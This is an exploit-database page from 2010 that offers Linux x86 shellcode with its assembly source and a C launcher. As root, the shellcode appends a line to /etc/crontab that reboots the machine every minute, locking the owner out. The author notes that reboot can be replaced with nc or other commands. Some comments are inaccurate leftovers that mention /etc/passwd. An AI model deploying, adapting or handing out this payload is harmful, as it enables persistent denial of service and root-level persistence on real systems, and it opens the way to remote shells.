[linux/x86] - linux/x86 setreuid(0,0) add reboot command eac
Posted on 27 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>linux/x86 setreuid(0,0) add reboot command each minutes 90 bytes | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 27 Sep 2010 | Exploit category: linux/x86 | Exploit author: xertux | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================================== linux/x86 setreuid(0,0) and add reboot command each minutes in /etc/crontab 90 bytes ==================================================================================== #include <stdio.h> /* * Title : linux x86 shellcode setreuid(0, 0) and add reboot command each minutes in /etc/crontab, 90 bytes * Author : xertux * Platform: Linux X86 * Description : setuid(0) + open(/etc/crontab, e0x441, 0x180) + write(fd, * * * * * root reboot , 22) + close(fd) * Add a line at /etc/crontab => * * * * * root reboot * Reboot the computer each minutes => An user hasn't the time to modify the /etc/crontab file * Dos Shellcode but we can replace reboot command by nc command or many other command... * Size : 90 bytes * */ /* BITS 32 ;setresuid(0,0,0) xor eax, eax ; eax become 0 xor ebx, ebx ; ebx become 0 xor ecx, ecx ; ecx become 0 cdq ; edx become 0 mov al, 0xa4 ; put call system 164 into eax int 0x80 ; execute setresuid(0,0,0) ;open(/etc/crontab, e0x441, 0x180)) push edx ; null string termination push 0x6261746e ; push "ntab" push 0x6f72632f ; push "/cro" push 0x6374652f ; push "/etc" mov ebx, esp ; put "/etc//passwd" into ebx mov WORD cx, 0x441 ; put the O_WRONLY | O_APPEND | O_CREATE argument mov WORD dx, 0x180 ; put the S_IRUSR | S_IWUSR argument push BYTE 0x5 ; put call system open on the stack pop eax ; get the system call number and insert into eax int 0x80 ; execute open(/etc//passwd, O_WRONLY | O_APPEND, S_IRUSR | S_IWUSR) ;write(fd, "* * * * * root reboot ", 22) ==> pass "toor" mov ebx, eax ; put the file descriptor return by open into ebx xor eax, eax ; eax become 0 push eax ; null termination string push WORD 0x0a74 ; push "t " push 0x6f6f6265 ; push "eboo" push 0x7220746f ; push "ot r" push 0x6f72202a ; push "* ro" push 0x202a202a ; push "* * " push 0x202a202a ; push "* * " mov ecx, esp ; put "* * * * * root reboot " into ebx push BYTE 22 ; put the size of line written on the stack pop edx ; get the size into edx mov al, 0x4 ; put the call system write into eax int 0x80 ; execute write(fd, * * * * * root reboot ", 22) ;close(fd) push BYTE 0x6 ; put the call system close on the stack pop eax ; put the call system number into eax int 0x80 ; execute close(fd) */ char shellcode[] = "x31xc0x31xdbx31xc9x99xb0xa4xcdx80x52x68x6ex74x61" "x62x68x2fx63x72x6fx68x2fx65x74x63x89xe3x66xb9x41" "x04x66xbax80x01x6ax05x58xcdx80x89xc3x31xc0x50x66" "x68x74x0ax68x65x62x6fx6fx68x6fx74x20x72x68x2ax20" "x72x6fx68x2ax20x2ax20x68x2ax20x2ax20x89xe1x6ax16" "x5axb0x04xcdx80x6ax06x58xcdx80"; int main() { printf("[*] Shellcode - length: %d ", strlen(shellcode)); (*(void(*)())shellcode)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-27]</pre></body></html>
